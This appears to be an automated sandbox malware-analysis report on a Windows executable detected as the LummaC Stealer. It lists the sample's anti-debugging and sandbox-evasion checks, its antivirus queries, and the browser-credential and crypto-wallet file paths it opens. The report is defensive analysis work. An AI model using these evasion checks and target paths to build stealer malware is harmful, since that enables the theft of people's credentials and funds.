          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C100B6 second address: 4C100F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F17414E3406h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17414E3407h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C100F9 second address: 4C10125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F174075FE7Ch 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10125 second address: 4C1012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1012B second address: 4C1012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1012F second address: 4C1015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17414E3408h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1015F second address: 4C10163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10163 second address: 4C10169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10BBA second address: 4C10C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE87h 0x00000009 or ah, FFFFFFFEh 0x0000000c jmp 00007F174075FE89h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F174075FE80h 0x00000018 xor si, 4EF8h 0x0000001d jmp 00007F174075FE7Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ebp, esp 0x00000028 jmp 00007F174075FE86h 0x0000002d cmp dword ptr [769B459Ch], 05h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov edx, 62274B70h 0x0000003c pushfd 0x0000003d jmp 00007F174075FE89h 0x00000042 adc cx, 7CF6h 0x00000047 jmp 00007F174075FE81h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C70 second address: 4C10C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E33FCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C80 second address: 4C10C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F17B249DBEDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 91h 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C97 second address: 4C10C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C9D second address: 4C10CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10CA1 second address: 4C10CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10CA5 second address: 4C10CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE7Bh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10DAB second address: 4C10DFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F17B3216FB3h 0x0000000f jmp 00007F17414E33FEh 0x00000014 cmp dword ptr [ebp+08h], 00002000h 0x0000001b pushad 0x0000001c call 00007F17414E33FEh 0x00000021 mov di, cx 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 movsx edx, cx 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10DFB second address: 4C10DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20925 second address: 4C2093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3403h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2093C second address: 4C20940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20940 second address: 4C2094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2094F second address: 4C20955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20955 second address: 4C20969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20969 second address: 4C2096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2096D second address: 4C20973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20973 second address: 4C209BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F174075FE89h 0x0000000c and ch, FFFFFFC6h 0x0000000f jmp 00007F174075FE81h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F174075FE7Dh 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209BC second address: 4C209C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209C2 second address: 4C209D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE7Bh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C209D8 second address: 4C20A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F17414E33FEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F17414E3400h 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F17414E33FDh 0x00000023 call 00007F17414E3400h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A3D second address: 4C20A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A43 second address: 4C20A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A47 second address: 4C20A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F17B248D7D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F174075FE7Dh 0x0000001a xor ch, 00000056h 0x0000001d jmp 00007F174075FE81h 0x00000022 popfd 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A86 second address: 4C20A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A8C second address: 4C20A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A90 second address: 4C20AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20AA5 second address: 4C20AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20AAB second address: 4C20B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3405h 0x00000009 and eax, 6BC28F16h 0x0000000f jmp 00007F17414E3401h 0x00000014 popfd 0x00000015 mov ax, 0D87h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F17B3228DAAh 0x00000022 pushad 0x00000023 mov eax, 5FC7267Fh 0x00000028 jmp 00007F17414E3404h 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B0B second address: 4C20B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B0F second address: 4C20B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B13 second address: 4C20B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B19 second address: 4C20B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B1E second address: 4C20B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F174075FE7Fh 0x00000013 pop esi 0x00000014 mov bh, 1Fh 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20B95 second address: 4C20BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4E0B38DAh 0x00000008 movsx edi, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov esi, edi 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BE3 second address: 4C20BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BE9 second address: 4C20BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BED second address: 4C20BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20BF1 second address: 4C20C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3401h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20C0F second address: 4C20C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20C13 second address: 4C20C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9BC87C instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9BA276 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B6FBBF instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BE9C11 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 2912Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 4416Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: file.exe, 00000000.00000003.2172133728.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327540061.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: file.exe, 00000000.00000003.2194148544.00000000055C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2217338623.000000000557B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194252257.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194042292.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240950831.0000000005582000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246418192.0000000005582000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lqeMuUnwoUAFmVCh
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: file.exe, 00000000.00000003.2194424183.00000000055B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: file.exe, 00000000.00000002.2326254421.0000000000B42000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, file.exe, 00000000.00000003.2270405791.000000000557D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270385828.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270727454.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: file.exeString found in binary or memory: %appdata%\Electrum\wallets
          Source: file.exeString found in binary or memory: %appdata%\ElectronCash\wallets
          Source: file.exeString found in binary or memory: Jaxx Liberty
          Source: file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: file.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: file.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: file.exe, 00000000.00000003.2246523182.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: file.exe, 00000000.00000003.2246370197.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.2246340098.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
